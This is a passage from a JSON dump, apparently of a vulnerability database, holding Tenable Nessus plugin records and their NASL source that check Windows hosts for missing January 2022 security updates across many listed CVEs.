CVE-2022-21870,\n CVE-2022-21871, CVE-2022-21872, CVE-2022-21873,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21885,\n CVE-2022-21887, CVE-2022-21896, CVE-2022-21897,\n CVE-2022-21901, CVE-2022-21902, CVE-2022-21908,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21847, CVE-2022-21848, CVE-2022-21883,\n CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009566\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5009566 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009566');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'22000',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009566])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:40:12", "description": "The remote Windows host is missing security update 5009546.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21860, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21871, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009546: Windows 10 Version 1607 and Windows Server 2016 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21897", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21911", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964"], "modified": "2022-04-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009546.NASL", "href": "https://www.tenable.com/plugins/nessus/156619", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156619);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/26\");\n\n script_cve_id(\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21857\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21878\",\n \"CVE-2022-21879\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21883\",\n \"CVE-2022-21884\",\n \"CVE-2022-21885\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21897\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21908\",\n \"CVE-2022-21910\",\n \"CVE-2022-21911\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\",\n \"CVE-2022-21964\"\n );\n script_xref(name:\"MSKB\", value:\"5009546\");\n script_xref(name:\"MSFT\", value:\"MS22-5009546\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009546: Windows 10 Version 1607 and Windows Server 2016 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009546.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009546\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009546.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21874\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009546');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'14393',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009546])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:13:37", "description": "The remote Windows host is missing security update 5009545.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21892, CVE-2022-21893, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21857, CVE-2022-21859, CVE-2022-21860, CVE-2022-21862, CVE-2022-21863, CVE-2022-21864, CVE-2022-21866, CVE-2022-21867, CVE-2022-21868, CVE-2022-21870, CVE-2022-21871, CVE-2022-21873, CVE-2022-21875, CVE-2022-21879, CVE-2022-21881, CVE-2022-21884, CVE-2022-21885, CVE-2022-21895, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21903, CVE-2022-21908, CVE-2022-21910, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009545: Windows 10 Version 1909 Security Update (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009545.NASL", "href": "https://www.tenable.com/plugins/nessus/156618", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156618);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21859\",\n \"CVE-2022-21860\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21863\",\n \"CVE-2022-21864\",\n \"CVE-2022-21865\",\n \"CVE-2022-21866\",\n \"CVE-2022-21867\",\n \"CVE-2022-21868\",\n \"CVE-2022-21869\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21875\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21878\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21885\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21895\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21898\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21903\",\n \"CVE-2022-21904\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21908\",\n \"CVE-2022-21912\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009545\");\n script_xref(name:\"MSFT\", value:\"MS22-5009545\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5009545: Windows 10 Version 1909 Security Update (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5009545.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21878, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21922, CVE-2022-21928, CVE-2022-21958,\n CVE-2022-21959, CVE-2022-21960, CVE-2022-21961,\n CVE-2022-21962, CVE-2022-21963)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21880,\n CVE-2022-21904, CVE-2022-21915)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21913, CVE-2022-21924, CVE-2022-21925)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21848, CVE-2022-21883, CVE-2022-21889,\n CVE-2022-21890)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21857, CVE-2022-21859,\n CVE-2022-21860, CVE-2022-21862, CVE-2022-21863,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21867,\n CVE-2022-21868, CVE-2022-21870, CVE-2022-21871,\n CVE-2022-21873, CVE-2022-21875, CVE-2022-21879,\n CVE-2022-21881, CVE-2022-21884, CVE-2022-21885,\n CVE-2022-21895, CVE-2022-21897, CVE-2022-21901,\n CVE-2022-21902, CVE-2022-21903, CVE-2022-21908,\n CVE-2022-21910, CVE-2022-21914, CVE-2022-21916,\n CVE-2022-21919, CVE-2022-21920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009545\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5009545.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21898\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009545');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'18363',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009545])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:13:37", "description": "The remote Windows host is missing security update 5009557.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21839, CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21904, CVE-2022-21915)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21878, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21898, CVE-2022-21907, CVE-2022-21912, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, 